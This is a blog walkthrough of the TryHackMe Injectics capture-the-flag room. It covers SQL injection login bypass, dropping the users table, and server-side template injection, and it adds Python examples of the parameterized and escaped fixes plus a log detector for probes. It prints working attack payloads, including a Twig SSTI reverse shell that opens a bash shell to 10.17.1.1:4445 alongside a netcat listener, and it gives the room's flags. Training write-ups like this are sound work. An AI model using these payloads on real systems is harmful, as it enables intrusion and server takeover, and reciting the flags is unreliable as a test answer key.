Web Application Pentesting: Injection Attacks in the TryHackMe Injectics Room

NIkhil Kumar
4 min read · Jan 9, 2025


Web application security is critical in today’s interconnected digital environment. Injection vulnerabilities are one of the most common and dangerous issues. In this blog, I’ll walk you through exploiting injection vulnerabilities in the TryHackMe Injectics Room. This challenge demonstrates how to uncover and leverage vulnerabilities to take control of a web application — ethically, of course!

Setup and Challenge Overview

The Injectics challenge tasks you with uncovering vulnerabilities in a web application. To start:

  • Target IP Address: 10.10.90.229
  • Required Tools: Burp Suite, browser, and netcat.
  • Goal: Extract two flags by exploiting vulnerabilities in the application.

Let’s dive in!

Step 1: Inspect the Web Application

Initial Clue: Always inspect the page source when starting your recon. Here, we find an important comment:

<!-- Website developed by John Tim - dev@injectics.thm -->
<!-- Mails are stored in mail.log file -->

This hints at a log file located at /mail.log. Visiting http://10.10.90.229/mail.log reveals:

From: dev@injectics.thm
To: superadmin@injectics.thm
Subject: Update before holidays

Hey,

Before heading off on holidays, I wanted to update you on the latest changes to the website. I have implemented several enhancements and enabled a special service called Injectics. This service continuously monitors the database to ensure it remains in a stable state.

To add an extra layer of safety, I have configured the service to automatically insert default credentials into the `users` table if it is ever deleted or becomes corrupted. This ensures that we always have a way to access the system and perform necessary maintenance. I have scheduled the service to run every minute.

Here are the default credentials that will be added:

| Email                     | Password              |
|---------------------------|-----------------------|
| superadmin@injectics.thm  | superSecurePasswd101  |
| dev@injectics.thm         | devPasswd123          |

Best regards,
Dev Team

Step 2: Exploit the Admin Login

Navigating to the admin login page (http://10.10.90.229/adminLogin007.php) reveals two input fields for email and password.

Method 1: SQL Injection

Use Burp Suite to capture the login request, then test SQL payloads by hand or from a wordlist such as the PayloadBox SQL Injection Payload List. A working payload might be:

' OR 'x'='x'#;
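To see why that payload logs you in, and what the fix looks like, here is an added example (my own code, not the room's PHP source or the author's): the login query built by string concatenation next to its parameterized form, both run against an in-memory SQLite table seeded with the two default accounts from mail.log. The table layout and the query text are assumptions about how the room's application is written. MySQL treats `#` as a comment to end of line, which is what the payload relies on; SQLite has no `#` comments, so the helper strips the commented tail before executing the statement the MySQL server would see.

```python
import sqlite3

PAYLOAD = "' OR 'x'='x'#;"   # the login payload quoted in the post

# Constructed sample data: the two default accounts listed in mail.log.
# A real deployment would keep a password hash (argon2/bcrypt/pbkdf2) in
# this column rather than plaintext; plaintext is used here only so the
# vulnerable query reads exactly as the application would build it.
SAMPLE_USERS = [
    ("superadmin@injectics.thm", "superSecurePasswd101"),
    ("dev@injectics.thm", "devPasswd123"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the room's `users` table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query_unsafe(email: str, password: str) -> str:
    """Vulnerable pattern: form fields spliced straight into the SQL text."""
    return ("SELECT email FROM users WHERE email='%s' AND password='%s'"
            % (email, password))


def mysql_effective_sql(query: str) -> str:
    """MySQL reads '#' outside a string literal as a comment to end of line,
    so everything after the injected '#' (the password check) is ignored.
    SQLite lacks '#' comments; strip the tail to run what MySQL would run.
    Simplified: the first '#' in the text is taken as the injected one."""
    return query.split("#", 1)[0]


def login_unsafe(conn: sqlite3.Connection, email: str, password: str) -> list:
    """Emails matched by the concatenated query (any row counts as a login)."""
    sql = mysql_effective_sql(build_query_unsafe(email, password))
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn: sqlite3.Connection, email: str, password: str):
    """Hardened form: placeholders bind both fields as data, so the quote
    and the '#' inside the payload can never change the statement's shape."""
    row = conn.execute(
        "SELECT email FROM users WHERE email=? AND password=?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    conn = make_db()
    return {
        # 'x'='x' is always true, so every row matches: login without a password
        "unsafe_with_payload": login_unsafe(conn, PAYLOAD, "wrong"),
        # the same text bound as a parameter matches no account
        "safe_with_payload": login_safe(conn, PAYLOAD, "wrong"),
        # legitimate credentials still work through the hardened path
        "safe_valid": login_safe(conn, "dev@injectics.thm", "devPasswd123"),
        # the statement MySQL actually executes after the comment is dropped
        "query_as_mysql_sees_it": mysql_effective_sql(
            build_query_unsafe(PAYLOAD, "wrong")),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The contrast is the whole lesson: in `build_query_unsafe` the quote in the payload closes the `email` literal, `OR 'x'='x'` makes the WHERE clause true for every row, and `#` comments out the password comparison. With placeholders the database driver never parses the payload as SQL, so the same bytes simply fail to match any email.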

Method 2: Default Credentials

After exploring, you can log in using the default credentials provided in the /mail.log file:

  • Email: superadmin@injectics.thm
  • Password: superSecurePasswd101

Step 3: Manipulating the Database

Once logged in, proceed to the update table section and use Burp Suite to intercept requests. Test dropping the users table with this SQL payload:

drop table users -- -

After executing this, the system automatically restores the default credentials within a minute (as per the /mail.log hint).

Log out and log back in with:

  • Email: superadmin@injectics.thm
  • Password: superSecurePasswd101

The flag will be:

THM{INJECTICS_ADMIN_PANEL_007}

Step 4: Exploiting SSTI Vulnerabilities

Navigate to the profile section and test the input fields for Server-Side Template Injection (SSTI) by entering:

{{7*7}}

If the output is 49, it confirms the vulnerability. Use this to execute commands. For a reverse shell, use the following payload:

{{ ["bash -c 'exec bash -i >& /dev/tcp/10.17.1.1/4445 0>&1'", ""] | sort('passthru') }}
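The root cause behind both the `{{7*7}}` probe and the `passthru` payload is the same: user input ends up inside the template source, so the engine evaluates it. The following added example (written by me for this post, not code from the room or from Twig) models that with a tiny `{{ }}` engine in Python: the vulnerable renderer treats the profile field as template text and evaluates expressions in it, while the hardened renderer keeps the template fixed and passes the field in as an escaped context variable. It also runs a small detector over constructed web-server access-log lines to show what the probe looks like on the defender's side. The `profile.php?name=` parameter and the log lines are assumptions, not the room's real paths.

```python
import html
import re
from urllib.parse import unquote_plus

PROBE = "{{7*7}}"   # the SSTI probe used in the post

# Matches a {{ expression }} tag and captures the expression text.
EXPR = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def render_unsafe(user_input: str) -> str:
    """Vulnerable pattern: the user's text is concatenated into the template
    *source*, so any {{ }} inside it is evaluated. eval() over arithmetic
    stands in for the real engine's expression language; in Twig or Jinja2
    that language also reaches filters and objects, which is how a probe
    escalates to command execution."""
    template_source = "Welcome back, " + user_input + "!"
    return EXPR.sub(
        lambda m: str(eval(m.group(1), {"__builtins__": {}}, {})),
        template_source,
    )


def render_safe(user_input: str) -> str:
    """Hardened pattern: the template is a fixed string written by the
    developer; user input enters only as a context variable and is escaped
    on output, so the braces come back as literal text."""
    template_source = "Welcome back, {{ name }}!"
    context = {"name": user_input}
    return EXPR.sub(
        lambda m: html.escape(str(context.get(m.group(1), ""))),
        template_source,
    )


# Constructed access-log lines (common log format), not taken from the room.
SAMPLE_LOG = """\
10.10.10.5 - - [09/Jan/2025:10:01:13 +0000] "GET /profile.php?name=Alice HTTP/1.1" 200 512
10.10.10.5 - - [09/Jan/2025:10:01:40 +0000] "GET /profile.php?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.10.10.5 - - [09/Jan/2025:10:02:02 +0000] "GET /profile.php?name=%7B%7B%20%5B%5D%20%7C%20sort(%27passthru%27)%20%7D%7D HTTP/1.1" 200 620
10.10.10.9 - - [09/Jan/2025:10:03:15 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP')
TEMPLATE_SYNTAX = re.compile(r"\{\{.*?\}\}|\{%.*?%\}")   # Twig/Jinja-style tags


def flag_ssti_probes(log_text: str) -> list:
    """Return the URL-decoded request targets that carry template syntax.
    Browsers percent-encode braces, so decode before matching; a legitimate
    profile name almost never contains '{{' or '{%'."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        decoded = unquote_plus(m.group(1))
        if TEMPLATE_SYNTAX.search(decoded):
            hits.append(decoded)
    return hits


def demo() -> dict:
    return {
        "unsafe": render_unsafe(PROBE),            # evaluated: 49 appears
        "safe": render_safe(PROBE),                # braces printed verbatim
        "probes_in_log": flag_ssti_probes(SAMPLE_LOG),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

A `49` in the response, as the post notes, proves the input was evaluated rather than displayed; the hardened renderer shows the string `{{7*7}}` unchanged. On the monitoring side the detector is deliberately narrow: template tags in a request parameter are a high-signal indicator worth alerting on, and the arithmetic probe usually appears in the logs a minute or two before any command-execution attempt.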

Step 5: Establishing Reverse Shell

  • Start a netcat listener on your attacking machine:

    nc -lvnp 4445

  • Submit the SSTI payload. Once executed, you’ll gain shell access to the server.

Step 6: Retrieving the Hidden Flag

With shell access, navigate to the flags directory:

cd flags
cat file.txt

The flag will be:

THM{5735172b6c147f4dd649872f73e0fdea}

Conclusion

This challenge showcased how web applications can be vulnerable to SQL Injection and SSTI. The key takeaways are:

  1. Always inspect the application’s source and logs for clues.
  2. SQL Injection remains a powerful attack vector when input sanitization is weak.
  3. SSTI vulnerabilities can lead to complete server compromise if not mitigated.

As ethical hackers, it’s our responsibility to find and report these vulnerabilities, helping developers secure their applications. Remember: With great power comes great responsibility.

Happy hacking!

Written by NIkhil Kumar

Cybersecurity enthusiast with skills in penetration testing, vulnerability assessment, and Python. Passionate about strengthening security protocols